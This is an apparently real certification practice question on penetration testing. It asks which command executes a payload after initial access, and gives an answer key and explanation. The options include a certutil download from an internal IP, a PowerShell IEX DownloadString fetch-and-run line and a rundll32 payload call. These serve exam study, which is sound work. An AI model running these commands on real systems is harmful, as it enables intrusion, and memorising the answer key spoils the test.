CompTIA PenTest+ (PT0-003) — Question 49
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?
Answer options
- A. powershell.exe impo C:\tools\foo.ps1
- B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe
- C. powershell.exe -noni -encode IEX.DownloadString("http://172.16.0.1/")
- D. rundll32.exe c:\path\foo.dll,functName
Correct answer: D
Explanation
The correct answer is D because it uses rundll32.exe to execute a function from a DLL, which is a common technique for executing payloads. Options A and C are PowerShell commands that may not provide the same level of access or capability for executing a payload effectively in all scenarios. Option B is focused on downloading an executable rather than executing a payload directly.